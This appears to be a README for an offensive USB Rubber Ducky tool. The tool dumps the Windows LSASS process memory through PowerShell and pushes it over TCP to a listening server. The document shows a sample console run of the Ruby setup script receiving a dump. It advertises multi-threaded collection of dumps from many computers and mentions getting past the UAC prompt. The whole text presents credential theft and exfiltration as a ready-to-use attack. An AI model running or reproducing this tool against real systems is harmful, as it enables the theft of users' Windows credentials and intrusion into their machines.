A ducky script that dumps the lsass process memory through powershell and then pushes it to a server through tcp.

ruby ducky_lsass_tcp.rb                                                                               
[!] Enter the host ip to listen on: 192.168.1.202
[+] Using 192.168.1.202 as server
[!] Enter the port you would like to use or leave blank for [443]: 4444
[+] Using 4444
[!] Would you like to set up the server now?[yes/no] yes
[*] Starting Server!
[+] Got lsass file!
[*] Getting Data
[*] Writing to File
[+] File Done!

The server that is setup is multi threaded so you can collect lsass dumps from multiple computers or servers.


Make sure you click on the UAC pop up for the ducky to click yes!